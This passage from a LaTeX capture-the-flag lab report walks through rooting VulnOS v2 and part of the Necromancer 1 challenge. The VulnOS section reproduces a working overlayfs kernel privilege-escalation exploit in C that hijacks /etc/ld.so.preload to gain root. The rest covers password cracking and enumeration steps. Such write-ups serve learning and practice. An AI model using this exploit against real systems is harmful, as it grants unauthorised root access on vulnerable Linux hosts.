And now after decoding the password that is encrypted in  MD5 we find out that the password is webmin1980. Now if we get back to the nmap scan that we did in the beginning we know that the ssh port is open aswell, meaning that we can log in using ssh, with the username webmin that we just got! After connecting we start to search for SUID files po nothing really useful shows up, the next thing that we can do, is exploit other information such as the version of the Operating System, the version of the kernel and so on, and we get the following results: Linux VulnOSv2 3.13.0-24-generic \#47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 athlon i686 GNU/Linux, so now we know the version of the kernel, let us head to the search engine and search for exploit code for this version of the kernel. After some research we stumble on this useful code\cite{vulnos-kernel-exploit}. I am going to paste the code here as well, just in case the site goes down, without the comments and the imported libraries, so that it doesn't become too large.
\begin{minted}{c}
static char child_stack[1024*1024];
 
static int
child_exec(void *stuff)
{
    char *file;
    system("rm -rf /tmp/ns_sploit");
    mkdir("/tmp/ns_sploit", 0777);
    mkdir("/tmp/ns_sploit/work", 0777);
    mkdir("/tmp/ns_sploit/upper",0777);
    mkdir("/tmp/ns_sploit/o",0777);
 
    fprintf(stderr,"mount #1\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/proc/sys/kernel,upperdir=/tmp/ns_sploit/upper") != 0) {
// workdir= and "overlay" is needed on newer kernels, also can't use /proc as lower
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/sys/kernel/security/apparmor,upperdir=/tmp/ns_sploit/upper,workdir=/tmp/ns_sploit/work") != 0) {
            fprintf(stderr, "no FS_USERNS_MOUNT for overlayfs on this kernel\n");
            exit(-1);
        }
        file = ".access";
        chmod("/tmp/ns_sploit/work/work",0777);
    } else file = "ns_last_pid";
 
    chdir("/tmp/ns_sploit/o");
    rename(file,"ld.so.preload");
 
    chdir("/");
    umount("/tmp/ns_sploit/o");
    fprintf(stderr,"mount #2\n");
    if (mount("overlay", "/tmp/ns_sploit/o", "overlayfs", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc") != 0) {
        if (mount("overlay", "/tmp/ns_sploit/o", "overlay", MS_MGC_VAL, "lowerdir=/tmp/ns_sploit/upper,upperdir=/etc,workdir=/tmp/ns_sploit/work") != 0) {
            exit(-1);
        }
        chmod("/tmp/ns_sploit/work/work",0777);
    }
 
    chmod("/tmp/ns_sploit/o/ld.so.preload",0777);
    umount("/tmp/ns_sploit/o");
}
 
int
main(int argc, char **argv)
{
    int status, fd, lib;
    pid_t wrapper, init;
    int clone_flags = CLONE_NEWNS | SIGCHLD;
 
    fprintf(stderr,"spawning threads\n");
 
    if((wrapper = fork()) == 0) {
        if(unshare(CLONE_NEWUSER) != 0)
            fprintf(stderr, "failed to create new user namespace\n");
 
        if((init = fork()) == 0) {
            pid_t pid =
                clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
            if(pid < 0) {
                fprintf(stderr, "failed to create new mount namespace\n");
                exit(-1);
            }
 
            waitpid(pid, &status, 0);
 
        }
 
        waitpid(init, &status, 0);
        return 0;
    }
 
    usleep(300000);
 
    wait(NULL);
 
    fprintf(stderr,"child threads done\n");
 
    fd = open("/etc/ld.so.preload",O_WRONLY);
 
    if(fd == -1) {
        fprintf(stderr,"exploit failed\n");
        exit(-1);
    }
 
    fprintf(stderr,"/etc/ld.so.preload created\n");
    fprintf(stderr,"creating shared library\n");
    lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
    write(lib,LIB,strlen(LIB));
    close(lib);
    lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
    if(lib != 0) {
        fprintf(stderr,"couldn't create dynamic library\n");
        exit(-1);
    }
    write(fd,"/tmp/ofs-lib.so\n",16);
    close(fd);
    system("rm -rf /tmp/ns_sploit /tmp/ofs-lib.c");
    execl("/bin/su","su",NULL);
}
\end{minted}
Now let us head over to /tmp and create save this in a C-file and then execute it, which is going to result into us becoming the root.
\begin{figure}[H]
  \centering
  \includegraphics[scale=0.6]{images/vulnos-root}
  \caption{Gaining root privileges}
\end{figure}

\subsection{Necromancer 1}
I was really excited to work on the next one, since I have never used a OpenBSD operating system in my life, so this was challenging, but also pretty satisfying in the end. The next virtual machine is called Necromancer 1 and is running OpenBSD. As per usual I started scanning with netdiscover to find out the IP address, and after that I started the nnmap as usually, only to find out literally nothing. So then I fired up tcpdump to listen and see whether I could find anything interesting, and what I could see is that the system periodically probes for any host that is listening on port 4444. So let's listen on port 4444 then. 
\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/necromancer-tcpdump}
  \caption{Tcpdump necromancer}
\end{figure}
And after listening on that particular port we get what looks like a text that is encoded in base 64, so after decoding it we get the following output:
\begin{figure}[H]
  \centering
  \includegraphics[scale=0.3]{images/necromancer-welcome}
  \caption{The decoded text, giving the hint for port 666}
\end{figure}
Now this is very exciting! Let's listen on port 666. When we listen, nothing shows up, I ended up waiting for like 1 minute or so, and then after writing something random, I got the message that time is running up, and that I am grasping for air! So I decided to use a md5 cracker, the first result that showed up on google.
\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/necromancer-opensesame}
  \caption{Listening on port 666}
\end{figure}
So after we got the correct result, we got to the second hint that looks like this:
\begin{figure}[H]
  \centering 
  \includegraphics[scale=0.3]{images/necromancer-secondhint}
  \caption{The decoded text, giving the hint for port 666}
\end{figure}
 That gives us the hint to follow the crows, namely to head over to port 80, so let's fire up the browser and write in the IP-Address, and this is going to get us the next piece of the story together with a picture.
 \begin{figure}[H]
  \centering
  \includegraphics[scale=0.3]{images/necromancer-story3}
  \caption{The next piece of the story}
\end{figure}
 \begin{figure}[H]
  \centering
  \includegraphics[scale=0.6]{images/necromancer-crows}
  \caption{Pile of weathers}
\end{figure}
In the first story we don't get that much information, at least on the first sight. So what we should do next is, to save the picture on our computer and then let's take a closer look at it by examining it with bitwalk. 
\begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/necromancer-bitwalk}
  \caption{The content of the picture}
\end{figure} 
From this we understand that we have indeed a text file, that is encoded in 64, and that once we decode it, we are going to get the next flag (we don't really care about flags here, since we are not focused on playing the game, but rather on learning as much as possible about exploiting and privilege escalation). After decoding the text we got the next hint that told us to go to another address.

 \begin{figure}[H]
  \centering
  \includegraphics[width=\textwidth]{images/necromancer-featherstxt}
  \caption{Pile of weathers}
\end{figure}
So after the hint that we got here, we head over to /amagicbridgeappearsatthechasm and only to get there the rest of the story that looks like this:
\begin{figure}[H]
  \centering
  \includegraphics[scale=0.3]{images/necromancer-story4}
  \caption{The next piece of the story}
\end{figure}
This time, there's nothing left to exploit from the picture sadly, but after analyzing the text which so blatantly tells us that we need a magic item to protect ourselves, we head over to the search engine to search for a list of magic items, to brute force ourselves in, so I was able to find one \cite{MAGIC}. After that we are going to use wfuzz, just like we did in Mr. Robot, and after all the scanning we can find the magic item, that is in fact an executable file that's called talisman, which then by using gdb we are going to debug it. By setting a breakpoint on the variable chantToBreakSpell we get the next piece of the story (notice that I am not including screen-shots, since there were many, many different and small steps so I did not take any screen-shots, and if I started including them, it would have been a very long section, because we are not even halfway there). The next piece of story is like so:
\textit{You fall to your knees.. weak and weary.
Looking up you can see the spell is still protecting the cave entrance.
The talisman is now almost too hot to touch!
Turning it over you see words now etched into the surface:
flag4{ea50536158db50247e110a6c89fcf3d3}
Chant these words at u31337} which gives us a hint that we have to use the UDP port with number 31337. Let's connect to it. After decrypting ea50536158db50247e110a6c89fcf3d3 on a random MD5 decrypter website, I got the result: blackmagic.

\bibliographystyle{plain}
\bibliography{reference}

\end{document}